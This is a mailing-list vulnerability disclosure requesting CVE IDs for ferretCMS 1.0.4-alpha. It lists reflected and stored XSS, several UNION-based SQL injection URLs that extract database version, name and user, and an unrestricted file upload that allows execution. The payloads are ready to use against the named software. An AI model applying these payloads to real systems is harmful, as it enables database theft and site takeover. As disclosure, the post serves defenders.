|
|
Message-ID: <CALH-=7wWJbiiD_QcrczrbWk6p30WQeHdHGQBjFk6GQQmxsnipw@mail.gmail.com>
Date: Fri, 23 Jan 2015 07:14:56 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- ferretCMS v.1.0.4-alpha -- Multiple reflecting/stored
XSS- and SQLi-vulnerabilities, unrestricted file upload
Hi Josh, Steve, vendors, list.
I found multiple reflecting/stored XSS- and SQLi-vulnerabilities as well as
an unrestricted file upload in the CMS ferretCMS v.1.0.4 which is currently
in the alpha development stage.
============
Reflecting XSS
============
http://
{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
============
Stored XSS
============
1.
via login-form of the administrative backend, input field for username:
http://{TARGET}/admin.php
executed here in the logevent functionality in the backend:
http://{TARGET}/admin.php?type=log&action=read
2.
via the new blog-post form, input field for pagetitle:
http://{TARGET}/admin.php?type=page&action=insert&p=
executed, for example, here:
http://{TARGET}/admin.php?type=page&action=read
============
SQLi
============
http://
{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
http://
{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
http://
{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
http://
{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
http://
{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://
{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+
==================
Unrestricted file upload
==================
An administrator has the opportunity to upload arbitrary files via a form
located here on a common ferretCMS installation:
http://{TARGET}/admin.php?type=uploader&action=upload
As these files aren't renamed and stored in the following location, any
unauthenticated user is able to read/execute those files, too:
http://{TARGET}/custom/uploads/{NAME_OF_THE_FILE}
Could you please assign a CVE-ID / CVE-IDs for these issues.
Thank you very much!
Greetings.
Steffen Rösemann
References:
[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
[5] http://seclists.org/fulldisclosure/2015/Jan/98
[6]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-10.html
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.